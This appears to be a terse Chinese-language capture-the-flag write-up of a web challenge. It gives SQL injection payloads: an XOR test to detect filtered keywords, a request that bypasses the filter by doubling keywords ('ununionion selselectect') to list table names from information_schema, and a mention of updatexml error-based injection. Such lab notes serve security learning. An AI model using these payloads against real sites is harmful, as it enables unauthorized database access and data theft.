第一个考点:异或注入判断过滤关键字
?id=1’^(length(‘union’)!=0)–+
过滤的用双写绕过
GET /1ndex.php?id=-1' ununionion selselectect 2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=0x776562313030322d31 --+
表名
列名
得到下一关入口
第二个考点:updatexml报错注入
表名
列名
cat flag